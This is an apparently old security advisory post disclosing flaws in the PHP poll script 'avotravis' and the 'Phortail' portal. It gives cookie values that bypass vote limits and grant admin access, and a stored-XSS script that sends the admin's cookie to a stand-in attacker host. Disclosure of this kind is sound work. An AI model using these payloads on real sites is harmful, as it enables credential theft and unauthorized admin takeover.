Security holes in two PHP services.

[frog frog <leseulfrog () hotmail com>]

The first one is poll "avotravis " versions 2.1 and less. 

1) Distortion of the limitations of multiple votes :
Set the cookie with the name "already_voted" and 
value "1" to the url /avotravis.php3?vote=1 for "yes" 
and /avotravis.php3?vote=1 for "no".

2) Access to the part administration :
Set the cookie "adminsondage", "true" to the 
webpage http://www.host.com/admin.php3

More details in french :
http://www.ifrance.com/kitetoua/tuto/avotravis.txt


The second is the portal "Phortail" versions 1.2.1 and 
less.

Admin password is sent uncrypted by cookie and 
there isn't limitation in the posting of the news for the 
scripts. 
It is enough to send this kind of script :
<im*g src="javascri*pt:phortail()">
<s*cript>function phortail() { 
a="http://haxor.com/file?"+document.cookie; 
window.open(a); } </s*cript>
(without '*') like a new and wait the admin...

More details in french :
http://www.ifrance.com/kitetoua/tuto/phortail.txt


Creators are alerted.
Sorry for my bad english.
frog-m@n